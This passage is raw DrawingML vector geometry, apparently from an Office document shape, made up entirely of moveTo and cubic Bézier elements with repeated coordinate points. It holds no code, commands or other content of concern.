                    <a:pt x="230" y="6"/>
                    <a:pt x="230" y="6"/>
                    <a:pt x="230" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="230" y="6"/>
                    <a:pt x="230" y="6"/>
                    <a:pt x="230" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="230" y="6"/>
                    <a:pt x="230" y="6"/>
                    <a:pt x="230" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="230" y="6"/>
                    <a:pt x="230" y="6"/>
                    <a:pt x="230" y="7"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="231" y="7"/>
                    <a:pt x="231" y="7"/>
                    <a:pt x="231" y="7"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="231" y="7"/>
                    <a:pt x="231" y="7"/>
                    <a:pt x="231" y="7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232" y="6"/>
                    <a:pt x="232" y="6"/>
                    <a:pt x="232" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="232" y="6"/>
                    <a:pt x="232" y="6"/>
                    <a:pt x="232" y="6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33" y="5"/>
                    <a:pt x="233" y="5"/>
                    <a:pt x="233" y="5"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="233" y="5"/>
                    <a:pt x="233" y="5"/>
                    <a:pt x="233" y="5"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="233" y="5"/>
                    <a:pt x="233" y="5"/>
                    <a:pt x="233" y="5"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="233" y="5"/>
                    <a:pt x="233" y="5"/>
                    <a:pt x="233" y="5"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="233" y="5"/>
                    <a:pt x="233" y="5"/>
                    <a:pt x="233" y="5"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="230" y="7"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="230" y="7"/>
                    <a:pt x="230" y="7"/>
                    <a:pt x="230" y="7"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="230" y="7"/>
                    <a:pt x="230" y="7"/>
                    <a:pt x="230" y="7"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="230" y="7"/>
                    <a:pt x="230" y="7"/>
                    <a:pt x="230" y="7"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="230" y="7"/>
                    <a:pt x="230" y="7"/>
                    <a:pt x="230" y="7"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="230" y="7"/>
                    <a:pt x="230" y="7"/>
                    <a:pt x="230" y="7"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="230" y="7"/>
                    <a:pt x="230" y="7"/>
                    <a:pt x="230" y="7"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="230" y="7"/>
                    <a:pt x="230" y="7"/>
                    <a:pt x="230" y="7"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="229" y="7"/>
                    <a:pt x="229" y="7"/>
                    <a:pt x="229" y="7"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="229" y="7"/>
                    <a:pt x="229" y="7"/>
                    <a:pt x="229" y="7"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="229" y="7"/>
                    <a:pt x="229" y="7"/>
                    <a:pt x="229" y="7"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="229" y="7"/>
                    <a:pt x="229" y="7"/>
                    <a:pt x="229" y="7"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="229" y="7"/>
                    <a:pt x="229" y="7"/>
                    <a:pt x="229" y="7"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="229" y="7"/>
                    <a:pt x="229" y="7"/>
                    <a:pt x="229" y="7"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="229" y="7"/>
                    <a:pt x="229" y="7"/>
                    <a:pt x="229" y="7"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="229" y="7"/>
                    <a:pt x="229" y="7"/>
                    <a:pt x="229" y="7"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="229" y="7"/>
                    <a:pt x="229" y="7"/>
                    <a:pt x="229" y="7"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="230" y="8"/>
                    <a:pt x="230" y="8"/>
                    <a:pt x="230" y="8"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="230" y="8"/>
                    <a:pt x="230" y="8"/>
                    <a:pt x="230" y="8"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="230" y="8"/>
                    <a:pt x="230" y="8"/>
                    <a:pt x="230" y="8"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="230" y="8"/>
                    <a:pt x="230" y="8"/>
                    <a:pt x="230" y="8"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="230" y="7"/>
                    <a:pt x="230" y="7"/>
                    <a:pt x="230" y="7"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="230" y="7"/>
                    <a:pt x="230" y="7"/>
                    <a:pt x="230" y="7"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="229" y="5"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="229" y="4"/>
                    <a:pt x="229" y="4"/>
                    <a:pt x="229" y="4"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="229" y="4"/>
                    <a:pt x="229" y="4"/>
                    <a:pt x="229" y="4"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="229" y="4"/>
                    <a:pt x="229" y="4"/>
                    <a:pt x="229" y="4"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="229" y="4"/>
                    <a:pt x="229" y="4"/>
                    <a:pt x="229" y="4"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="229" y="4"/>
                    <a:pt x="229" y="4"/>
                    <a:pt x="229" y="4"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="229" y="4"/>
                    <a:pt x="229" y="4"/>
                    <a:pt x="229" y="4"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="228" y="4"/>
                    <a:pt x="228" y="4"/>
                    <a:pt x="228" y="4"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="228" y="4"/>
                    <a:pt x="228" y="4"/>
                    <a:pt x="228" y="4"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="228" y="5"/>
                    <a:pt x="228" y="5"/>
                    <a:pt x="228" y="5"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="228" y="5"/>
                    <a:pt x="228" y="5"/>
                    <a:pt x="228" y="5"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="229" y="5"/>
                    <a:pt x="229" y="5"/>
                    <a:pt x="229" y="5"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="229" y="5"/>
                    <a:pt x="229" y="5"/>
                    <a:pt x="229" y="5"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="229" y="5"/>
                    <a:pt x="229" y="5"/>
                    <a:pt x="229" y="5"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="229" y="5"/>
                    <a:pt x="229" y="5"/>
                    <a:pt x="229" y="5"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="156" y="36"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="156" y="36"/>
                    <a:pt x="156" y="36"/>
                    <a:pt x="156" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="156" y="36"/>
                    <a:pt x="156" y="36"/>
                    <a:pt x="157" y="35"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="156" y="35"/>
                    <a:pt x="155" y="35"/>
                    <a:pt x="155" y="35"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="154" y="35"/>
                    <a:pt x="154" y="35"/>
                    <a:pt x="154" y="35"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="154" y="36"/>
                    <a:pt x="154" y="36"/>
                    <a:pt x="154" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="153" y="36"/>
                    <a:pt x="153" y="37"/>
                    <a:pt x="152" y="38"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="153" y="38"/>
                    <a:pt x="153" y="38"/>
                    <a:pt x="153" y="38"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="153" y="38"/>
                    <a:pt x="154" y="37"/>
                    <a:pt x="154" y="37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5" y="37"/>
                    <a:pt x="155" y="37"/>
                    <a:pt x="155" y="37"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="156" y="36"/>
                    <a:pt x="156" y="36"/>
                    <a:pt x="156" y="36"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="204" y="14"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="14"/>
                    <a:pt x="204" y="14"/>
                    <a:pt x="204" y="13"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="13"/>
                    <a:pt x="204" y="13"/>
                    <a:pt x="204" y="13"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="13"/>
                    <a:pt x="204" y="13"/>
                    <a:pt x="204" y="13"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="13"/>
                    <a:pt x="204" y="13"/>
                    <a:pt x="204" y="13"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="203" y="13"/>
                    <a:pt x="203" y="13"/>
                    <a:pt x="203" y="13"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="196" y="15"/>
                    <a:pt x="196" y="15"/>
                    <a:pt x="196" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="195" y="15"/>
                    <a:pt x="195" y="15"/>
                    <a:pt x="195" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="193" y="15"/>
                    <a:pt x="193" y="15"/>
                    <a:pt x="192" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="191" y="16"/>
                    <a:pt x="191" y="16"/>
                    <a:pt x="190" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="186" y="18"/>
                    <a:pt x="183" y="19"/>
                    <a:pt x="182" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="182" y="20"/>
                    <a:pt x="182" y="20"/>
                    <a:pt x="182" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="181" y="21"/>
                    <a:pt x="181" y="21"/>
                    <a:pt x="181" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="178" y="21"/>
                    <a:pt x="178" y="21"/>
                    <a:pt x="177" y="22"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="178" y="22"/>
                    <a:pt x="178" y="22"/>
                    <a:pt x="178" y="22"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="178" y="22"/>
                    <a:pt x="178" y="22"/>
                    <a:pt x="178" y="22"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="23"/>
                    <a:pt x="177" y="23"/>
                    <a:pt x="177" y="23"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="23"/>
                    <a:pt x="177" y="23"/>
                    <a:pt x="177" y="23"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="176" y="23"/>
                    <a:pt x="176" y="23"/>
                    <a:pt x="176" y="23"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="176" y="23"/>
                    <a:pt x="176" y="23"/>
                    <a:pt x="176" y="23"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="176" y="23"/>
                    <a:pt x="176" y="23"/>
                    <a:pt x="176" y="23"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="175" y="23"/>
                    <a:pt x="175" y="24"/>
                    <a:pt x="174" y="24"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="169" y="26"/>
                    <a:pt x="169" y="26"/>
                    <a:pt x="169" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="168" y="27"/>
                    <a:pt x="168" y="27"/>
                    <a:pt x="166" y="29"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="166" y="29"/>
                    <a:pt x="166" y="29"/>
                    <a:pt x="166" y="29"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="167" y="29"/>
                    <a:pt x="167" y="29"/>
                    <a:pt x="167" y="28"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="168" y="29"/>
                    <a:pt x="168" y="29"/>
                    <a:pt x="168" y="29"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="167" y="29"/>
                    <a:pt x="167" y="29"/>
                    <a:pt x="167" y="29"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="167" y="29"/>
                    <a:pt x="168" y="29"/>
                    <a:pt x="168" y="29"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="168" y="29"/>
                    <a:pt x="168" y="30"/>
                    <a:pt x="168" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="167" y="31"/>
                    <a:pt x="167" y="31"/>
                    <a:pt x="167" y="31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7" y="31"/>
                    <a:pt x="167" y="31"/>
                    <a:pt x="168" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="169" y="32"/>
                    <a:pt x="169" y="32"/>
                    <a:pt x="170" y="32"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="171" y="32"/>
                    <a:pt x="171" y="32"/>
                    <a:pt x="171" y="32"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="171" y="32"/>
                    <a:pt x="171" y="32"/>
                    <a:pt x="171" y="32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3" y="30"/>
                    <a:pt x="173" y="30"/>
                    <a:pt x="173" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="173" y="30"/>
                    <a:pt x="173" y="30"/>
                    <a:pt x="173" y="3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173" y="30"/>
                    <a:pt x="173" y="30"/>
                    <a:pt x="173" y="28"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="173" y="28"/>
                    <a:pt x="173" y="28"/>
                    <a:pt x="173" y="28"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="173" y="28"/>
                    <a:pt x="173" y="28"/>
                    <a:pt x="173" y="28"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="174" y="27"/>
                    <a:pt x="174" y="27"/>
                    <a:pt x="174" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="175" y="26"/>
                    <a:pt x="175" y="26"/>
                    <a:pt x="175" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="176" y="26"/>
                    <a:pt x="177" y="25"/>
                    <a:pt x="178" y="24"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="179" y="23"/>
                    <a:pt x="179" y="23"/>
                    <a:pt x="179" y="23"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="179" y="23"/>
                    <a:pt x="179" y="23"/>
                    <a:pt x="179" y="23"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="179" y="23"/>
                    <a:pt x="179" y="23"/>
                    <a:pt x="179" y="23"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="180" y="23"/>
                    <a:pt x="180" y="23"/>
                    <a:pt x="180" y="23"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="180" y="23"/>
                    <a:pt x="185" y="21"/>
                    <a:pt x="186" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="186" y="20"/>
                    <a:pt x="188" y="20"/>
                    <a:pt x="188" y="19"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="189" y="19"/>
                    <a:pt x="189" y="19"/>
                    <a:pt x="189" y="19"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="190" y="19"/>
                    <a:pt x="191" y="18"/>
                    <a:pt x="192" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="196" y="16"/>
                    <a:pt x="196" y="16"/>
                    <a:pt x="196" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="196" y="16"/>
                    <a:pt x="197" y="16"/>
                    <a:pt x="197" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="197" y="16"/>
                    <a:pt x="200" y="16"/>
                    <a:pt x="200" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="200" y="16"/>
                    <a:pt x="201" y="16"/>
                    <a:pt x="201" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="203" y="15"/>
                    <a:pt x="204" y="15"/>
                    <a:pt x="204" y="14"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="199" y="24"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="199" y="23"/>
                    <a:pt x="199" y="23"/>
                    <a:pt x="199" y="23"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="199" y="23"/>
                    <a:pt x="199" y="23"/>
                    <a:pt x="199" y="23"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="198" y="23"/>
                    <a:pt x="198" y="23"/>
                    <a:pt x="196" y="24"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="196" y="24"/>
                    <a:pt x="196" y="24"/>
                    <a:pt x="196" y="24"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="197" y="24"/>
                    <a:pt x="197" y="24"/>
                    <a:pt x="197" y="24"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="197" y="24"/>
                    <a:pt x="197" y="24"/>
                    <a:pt x="197" y="24"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="198" y="24"/>
                    <a:pt x="198" y="24"/>
                    <a:pt x="198" y="24"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="198" y="24"/>
                    <a:pt x="198" y="24"/>
                    <a:pt x="198" y="24"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="199" y="24"/>
                    <a:pt x="199" y="24"/>
                    <a:pt x="199" y="24"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="199" y="24"/>
                    <a:pt x="199" y="24"/>
                    <a:pt x="199" y="24"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="215" y="4"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="215" y="4"/>
                    <a:pt x="215" y="4"/>
                    <a:pt x="215" y="4"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="215" y="4"/>
                    <a:pt x="215" y="4"/>
                    <a:pt x="215" y="4"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="215" y="4"/>
                    <a:pt x="215" y="4"/>
                    <a:pt x="215" y="4"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="215" y="4"/>
                    <a:pt x="215" y="4"/>
                    <a:pt x="215" y="4"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="215" y="4"/>
                    <a:pt x="215" y="4"/>
                    <a:pt x="215" y="4"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="214" y="4"/>
                    <a:pt x="214" y="4"/>
                    <a:pt x="214" y="4"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="214" y="4"/>
                    <a:pt x="214" y="4"/>
                    <a:pt x="214" y="4"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="214" y="4"/>
                    <a:pt x="214" y="4"/>
                    <a:pt x="214" y="4"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="213" y="4"/>
                    <a:pt x="213" y="4"/>
                    <a:pt x="213" y="4"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="213" y="4"/>
                    <a:pt x="213" y="4"/>
                    <a:pt x="213" y="4"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="213" y="4"/>
                    <a:pt x="213" y="4"/>
                    <a:pt x="213" y="4"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="212" y="5"/>
                    <a:pt x="212" y="5"/>
                    <a:pt x="212" y="5"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="213" y="5"/>
                    <a:pt x="213" y="5"/>
                    <a:pt x="213" y="5"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="214" y="5"/>
                    <a:pt x="214" y="4"/>
                    <a:pt x="215" y="4"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="211" y="5"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="211" y="5"/>
                    <a:pt x="211" y="5"/>
                    <a:pt x="211" y="5"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="212" y="4"/>
                    <a:pt x="212" y="4"/>
                    <a:pt x="213" y="4"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="213" y="4"/>
                    <a:pt x="213" y="4"/>
                    <a:pt x="213" y="4"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="212" y="4"/>
                    <a:pt x="212" y="4"/>
                    <a:pt x="211" y="4"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="212" y="4"/>
                    <a:pt x="212" y="4"/>
                    <a:pt x="212" y="4"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="211" y="5"/>
                    <a:pt x="211" y="5"/>
                    <a:pt x="211" y="5"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="210" y="5"/>
                    <a:pt x="210" y="5"/>
                    <a:pt x="210" y="5"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="209" y="5"/>
                    <a:pt x="209" y="5"/>
                    <a:pt x="209" y="5"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="209" y="5"/>
                    <a:pt x="209" y="5"/>
                    <a:pt x="209" y="5"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="209" y="5"/>
                    <a:pt x="209" y="5"/>
                    <a:pt x="209" y="5"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="209" y="5"/>
                    <a:pt x="209" y="5"/>
                    <a:pt x="209" y="5"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="210" y="5"/>
                    <a:pt x="210" y="5"/>
                    <a:pt x="210" y="5"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="210" y="5"/>
                    <a:pt x="210" y="5"/>
                    <a:pt x="210" y="5"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="210" y="5"/>
                    <a:pt x="210" y="5"/>
                    <a:pt x="210" y="5"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="210" y="5"/>
                    <a:pt x="210" y="5"/>
                    <a:pt x="210" y="5"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="211" y="5"/>
                    <a:pt x="211" y="5"/>
                    <a:pt x="211" y="5"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="208" y="6"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="208" y="6"/>
                    <a:pt x="208" y="6"/>
                    <a:pt x="208" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="208" y="6"/>
                    <a:pt x="208" y="6"/>
                    <a:pt x="208" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="207" y="6"/>
                    <a:pt x="207" y="6"/>
                    <a:pt x="207" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="207" y="6"/>
                    <a:pt x="207" y="6"/>
                    <a:pt x="207" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="207" y="6"/>
                    <a:pt x="207" y="6"/>
                    <a:pt x="207" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="207" y="6"/>
                    <a:pt x="207" y="6"/>
                    <a:pt x="207" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="207" y="6"/>
                    <a:pt x="207" y="6"/>
                    <a:pt x="207" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="206" y="6"/>
                    <a:pt x="206" y="6"/>
                    <a:pt x="206" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="206" y="6"/>
                    <a:pt x="206" y="6"/>
                    <a:pt x="206" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="207" y="6"/>
                    <a:pt x="207" y="6"/>
                    <a:pt x="207" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="207" y="6"/>
                    <a:pt x="207" y="6"/>
                    <a:pt x="207" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="207" y="6"/>
                    <a:pt x="207" y="6"/>
                    <a:pt x="207" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="208" y="6"/>
                    <a:pt x="208" y="6"/>
                    <a:pt x="208" y="6"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="208" y="6"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="208" y="5"/>
                    <a:pt x="208" y="5"/>
                    <a:pt x="208" y="5"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="209" y="5"/>
                    <a:pt x="209" y="5"/>
                    <a:pt x="209" y="5"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="208" y="5"/>
                    <a:pt x="208" y="5"/>
                    <a:pt x="208" y="5"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="207" y="5"/>
                    <a:pt x="207" y="6"/>
                    <a:pt x="206" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="205" y="6"/>
                    <a:pt x="205" y="6"/>
                    <a:pt x="205" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="206" y="6"/>
                    <a:pt x="206" y="6"/>
                    <a:pt x="206" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="206" y="6"/>
                    <a:pt x="206" y="6"/>
                    <a:pt x="207" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="206" y="6"/>
                    <a:pt x="206" y="6"/>
                    <a:pt x="206" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="206" y="6"/>
                    <a:pt x="206" y="6"/>
                    <a:pt x="206" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="207" y="6"/>
                    <a:pt x="207" y="6"/>
                    <a:pt x="208" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="208" y="6"/>
                    <a:pt x="208" y="6"/>
                    <a:pt x="208" y="6"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="211" y="4"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="211" y="4"/>
                    <a:pt x="211" y="4"/>
                    <a:pt x="211" y="4"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="212" y="4"/>
                    <a:pt x="212" y="4"/>
                    <a:pt x="212" y="4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2" y="4"/>
                    <a:pt x="212" y="4"/>
                    <a:pt x="213" y="4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2" y="4"/>
                    <a:pt x="212" y="4"/>
                    <a:pt x="211" y="4"/>
                  </a:cubicBezTo>
